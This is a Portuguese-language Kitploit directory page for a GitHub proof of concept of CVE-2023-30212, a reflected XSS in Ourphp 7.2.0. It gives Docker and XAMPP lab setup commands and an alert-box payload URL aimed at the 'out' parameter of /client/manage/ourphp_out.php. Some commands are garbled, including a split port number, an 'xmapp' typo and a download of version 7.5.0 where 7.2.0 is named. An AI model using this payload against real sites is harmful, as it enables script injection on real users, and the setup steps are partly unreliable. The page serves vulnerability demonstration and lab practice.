Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-30212-POC — Exploração de prova de conceito para CVE-2023-30212, uma vulnerabilidade XSS no Ourphp 7.2.0, incluindo configuração do Docker e demonstração de payload. | Kitploit
Ferramentas/GitHubGitHub/arunsnap/cve-2023-30212-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubarunsnap/cve-2023-30212-poc

CVE-2023-30212-POC

Exploração de prova de conceito para CVE-2023-30212, uma vulnerabilidade XSS no Ourphp 7.2.0, incluindo configuração do Docker e demonstração de payload.

Ver Repositório
11há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-30212-POC

Criando um Ambiente Docker Vulnerável & Explorando Vulnerabilidade no Ourphp versão 7.2.0 (CVE 2023 30212)

Passo 1. Baixe e instale o Docker no seu sistema. Estou usando Docker porque é rápido e fácil de instalar o Ubuntu

Passo 2. Configurar o ambiente Docker

root@kitploit:~
sudo apt-get install docker.io
docker pull ubuntu
docker run -d -t --name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
docker exec -it test-container bash

Passo 3. Instalando dependências

root@kitploit:~
apt-get update
apt-get install wget
apt-get install nano
apt-get install unzip
apt-get install net-tools
apt-get install locate

Passo 4. Instalar servidor web, php & mysql. Instalarei o servidor xampp para isso.

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
cd /opt/lampp
./xmapp start

Passo 5. Baixar Ourphp versão 7.2.0

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
cp ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 777

Passo 6. Configurar Ourphp no navegador Abra seu navegador e digite localhost ou 127.0.0.1 Siga as instruções e instale o Ourphp

Passo 7. Explorando a vulnerabilidade Ourphp versão 7.2.0 possui uma vulnerabilidade a XSS (Cross-Site Scripting). Para mitigar a vulnerabilidade no arquivo /client/manage/ourphp_out.php que permite a execução de código XSS

login finding

você precisa modificar o código. A vulnerabilidade surge quando o parâmetro "ourphp_admin" é definido como "logout" e a variável controlável é "out"

final

Prova de Conceito

root@kitploit:~
 payload - "</script><script>alert('xss')</script>".
root@kitploit:~
parameter - http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

vídeo

video
(https://www.youtube.com/watch?v=l9lHyjY9_X0)

Baixar ferramenta